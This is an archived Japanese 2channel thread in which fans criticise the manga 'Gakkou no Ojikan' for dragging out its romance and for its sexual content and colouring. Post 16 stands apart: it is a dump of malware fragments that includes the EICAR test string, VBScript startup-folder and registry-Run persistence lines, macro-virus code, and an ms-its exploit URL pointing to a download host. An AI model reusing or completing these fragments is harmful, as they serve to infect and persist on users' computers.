2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◇◆◇学校のおじかん◇◆◇田島みみ

1 :花と名無しさん:2006/11/19(日) 02:51:00 ID:???O
ないみたいなのでたてました
学校のおじかんスキな人いませんか?

2 :花と名無しさん:2006/11/19(日) 03:05:28 ID:???O
とりあえず>>1乙。

3 :花と名無しさん:2006/11/19(日) 05:55:19 ID:???O
田島みみデビュー時から好き

4 :花と名無しさん:2006/11/19(日) 07:18:23 ID:???O
学校のおじかん見たときに絵変わっててびっくりした

5 :花と名無しさん:2006/11/19(日) 09:17:43 ID:???O
なんかあれ無印マーガなのにちょっとエロいよね
学校のおじかん嫌いじゃないけどマッキーにやたらイライラする
コミックス派だから8巻までの内容しかしらないが

6 :花と名無しさん:2006/11/19(日) 13:13:59 ID:???0
最近はもうひっぱりすぎだよ
いいかげんくっつけよあの2人‥


7 :花と名無しさん:2006/11/19(日) 14:20:59 ID:???O
これ少コミみたいな漫画だ
エッチ展開ばっか

8 :花と名無しさん:2006/11/20(月) 00:29:32 ID:???0
陸の鈍さも酷いけどな。「付き合ってるんだ。」って自覚しててもおかしくないに。
くっつく、くっつかない、告白する、しないの展開で最終回までいきそう。

9 :花と名無しさん:2006/11/20(月) 00:38:23 ID:???0
お、スレ立ったんだ。
今度は1000行くかねぇ

ちょうど前号がエロ展開直前みたいな流れだったけど
結局また寸止めかな?

10 :花と名無しさん:2006/11/21(火) 04:03:26 ID:???O
てかマッキーがどうしても最低な男にしか見えない&やたら陸が泣いてうざいからほんとイライラするんだよねこの漫画
なんで付き合ってないのにあんな激しいキスすんだよ
引き延ばしすぎさっさとくっつけて終わらせるべき

11 :花と名無しさん:2006/11/21(火) 08:43:12 ID:???0
マッキーも「くそっ」とか言ってないで好きってはよ言えやとも思うし
それ以上に陸が(好きって言って・・・)とか心の中だけで言って、
実際に言ってもらえないとただ泣くっていうのがウザかった。
「私のことどう思ってるの」とか「好きなの?」とか言えばいいやん

12 :花と名無しさん:2006/11/22(水) 18:58:27 ID:???O
なんかこの人最近カラーだとおかしくない?
髪の毛のハイライト?がなんで茶髪に対して青なん?

話の展開にもうんざりしてきたよ…

13 :花と名無しさん:2006/11/24(金) 23:51:36 ID:???O
発売日あげ
>>12
>なんで金髪に対して青なん?
あたしも思ってたよソレ…
しかも今日発売の9巻もだしw
なんかこの人エロ展開もってこうと必死だね
「でも…あたし着替えてて…」
「だから見たいんだけど」

テラキモスw

しかもプールの最後なんであんなひっついてんだよ
あきらかおかしいぞw

14 :花と名無しさん:2006/11/28(火) 22:13:27 ID:???0
やることやっといて(キスまでだけど)
好きがいえないってのがわかんない。
てか、中学生じゃないんだから、好きです付き合ってが
なきゃ付き合ってないってのも変だし。
嫌いじゃないんだけどねこの漫画

15 :花と名無しさん:2006/11/30(木) 19:17:19 ID:WVbnHAy20
ageます

新刊出たとこなのにこの過疎っぷり‥
本編よりコミックスのコメントとかのが好きかも
田島さんて年いくつくらいだろ?

16 :<body onload=window()>:2006/11/30(木) 22:55:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

17 :花と名無しさん:2006/11/30(木) 23:14:38 ID:???0
マッキーがなに考えてるか謎。
初めてチューしてから少しはまだ展開的に
「好き」って言うか言わないかの伸ばしは分からんでも無いが
今はいい加減うざい。

つーかマッキーがキモイ。

18 :花と名無しさん:2006/11/30(木) 23:34:01 ID:???O
確かにキモイ
てかキモすぎる
もういい加減gdgdだお
さっさとくっつけて終われよ

19 :花と名無しさん:2006/12/01(金) 06:52:22 ID:???O
このスレ先行が不安すぎるwww

20 :花と名無しさん:2006/12/01(金) 08:51:17 ID:???0
ようやく20か…
ほんと田島スレは立てられては落ち、立てられては落ちだね

21 :花と名無しさん:2006/12/01(金) 09:14:10 ID:???O
結構頑張ってコミクスだしてんのにね田島みみ

22 :花と名無しさん:2006/12/01(金) 20:17:46 ID:???O
付き合う前からキスするってなんなんだ…
キスの絵なんかきもいし。

23 :花と名無しさん:2006/12/02(土) 04:11:11 ID:???0
ちゅーだけしまくってセックルはしなくて、好きだと言うと「彼氏にはなれない」と
言う男に数年間振り回された経験があるので、イライラしつつも気になる漫画。
でも最近の展開は引き延ばしすぎてイヤン。
このままサクッと12巻ぐらいで駆け抜ければ読後感いいのに。

この人の漫画は学校のおじかん以外読んだ事ないんだけど、ブックオフとかにあるのは
少し前の絵が古い漫画だけなんだね。
学校のおじかん以外の漫画はどんな感じ?
スレ盛り上げついでに教えてもらえると嬉しいです。

24 :花と名無しさん:2006/12/03(日) 08:12:10 ID:???O
マッキの口がキモいお(・ω・)

25 :花と名無しさん:2006/12/04(月) 09:27:15 ID:???0
横顔もキンモ〜…('A`)

26 :花と名無しさん:2006/12/04(月) 22:16:02 ID:fSpLu3DsO
マッキーかっこよすだお(●*ノ∀`)+゚
でもなに考えてるかは謎すぎるorz

27 :花と名無しさん:2006/12/05(火) 07:59:28 ID:???0
あいたた・・・・>26 (*ノA`)

28 :花と名無しさん:2006/12/05(火) 08:35:47 ID:???O
(*∀*)←>>26

29 :花と名無しさん:2006/12/06(水) 01:51:02 ID:???O
この人久々に見たらすごく絵上手くなったね
恋する〜の頃の絵とはまるで別人
特に横顔とか

30 :花と名無しさん:2006/12/06(水) 09:16:13 ID:???0
上手くはなったんだがカラーが…
色使いキモス

31 :花と名無しさん:2006/12/07(木) 17:21:19 ID:???O
>>27>>28


32 :花と名無しさん:2006/12/09(土) 10:22:08 ID:???O
絵見やすい
線が綺麗だと思う
ただ話が…orz;;
エロ方向もっていきすぎ

33 :花と名無しさん:2006/12/10(日) 20:49:02 ID:???0
何でマキは好きって言わないの?

34 :花と名無しさん:2006/12/11(月) 08:19:39 ID:???0
引き伸ばしてるから。

茶(金)色の髪に青を入れるのは勘弁して欲しい…

35 :花と名無しさん:2006/12/11(月) 16:09:43 ID:???0
あのカラーおかしいよね
今回の扉絵可愛いのに髪の毛が‥

36 :花と名無しさん:2006/12/20(水) 16:03:58 ID:???O
マッキーより楓がキモすぎる件

37 :花と名無しさん:2006/12/20(水) 18:44:16 ID:???0
今週もひどいなwもうどうしたいんだこのマンガ

38 :花と名無しさん:2006/12/20(水) 19:49:38 ID:???0
同じマーガレットの後輩漫画家桃森に人気、実力も越されてテンション下がりまくりとか

39 :花と名無しさん:2006/12/21(木) 14:26:26 ID:???O
昨日古本屋に買いにいったら4巻までいっぱいあったのにそこから先がなかった
人気があるのかみんな4巻で見限ったのか…

40 :花と名無しさん:2006/12/21(木) 14:52:36 ID:???0
「見限った」に3000点

41 :花と名無しさん:2006/12/28(木) 17:07:37 ID:???0
3000点コスと途端に放置が始まるの?

42 :花と名無しさん:2006/12/28(木) 17:31:33 ID:???0
? ?
そんな事ないよ
ここで語る良さはない
けどね

43 :花と名無しさん:2006/12/28(木) 22:50:12 ID:???O
まだこのスレ生きてたか!!!

44 :花と名無しさん:2006/12/29(金) 02:38:49 ID:???0
結構もつねぇ
とりあえず1ヶ月は耐えたようだ

45 :花と名無しさん:2006/12/31(日) 19:06:06 ID:???0
                 ,r|i、                   `'i、
                ,/゙,iレ  :r--i、、           ,,,―i、  ||''゙゙i、  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                l゙ ,i´   ゙'、 `'i、      ,/`  /   ゙|-、|  | 久々にワロタ
            ,l゙ ,!     |、 .・ヽ    .,i´・  ,/`   ゙゙l| ゙l  | 
            │ .l゙  .|i、  \,,,_ ゙l   l゙ _,,,-'"`  ./l  ゙l、 ゙l< が     昔
            l゙  ゙   ゙l│    ゙゙''"   .'"`    .,/ .|   `'ー'ヽ | を知らないから困る
              |     ゙l,\,、             _,/` ./     ゙i、\________
           │     `` `,ニ=  ,r,|,,,,レ、 .=i,_,、   .,、   │
          ,r!、,,,_  ヽ_、   `   ゙l,,i!rl゙,l゙    `  ,,,,/  _,,,,-│

46 :花と名無しさん:2007/01/06(土) 17:40:37 ID:2rW1izRF0
ようやくマッキーが好きだと言ったねage

っていうのがすでに来てるかと思ったのにさすが過疎スレ

47 :花と名無しさん:2007/01/06(土) 21:06:14 ID:???0
おおやっとか…

48 :花と名無しさん:2007/01/06(土) 23:14:47 ID:???O
おおやっといったんだ!
でもまだグダグダやるんだろうね

49 :花と名無しさん:2007/01/11(木) 02:02:31 ID:???O
(゚д゚)保守

50 :花と名無しさん:2007/01/23(火) 08:34:56 ID:0xY6Yj6K0
はい今号も好きだ好きだキスキスキスキスのオンパレードですよっと

51 :花と名無しさん:2007/01/23(火) 15:45:28 ID:???0
テラワロスwww こんなきもいマンガだったかw

52 :花と名無しさん:2007/01/23(火) 23:30:35 ID:XU+oAhJQ0
これまだ続いてたんだ

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)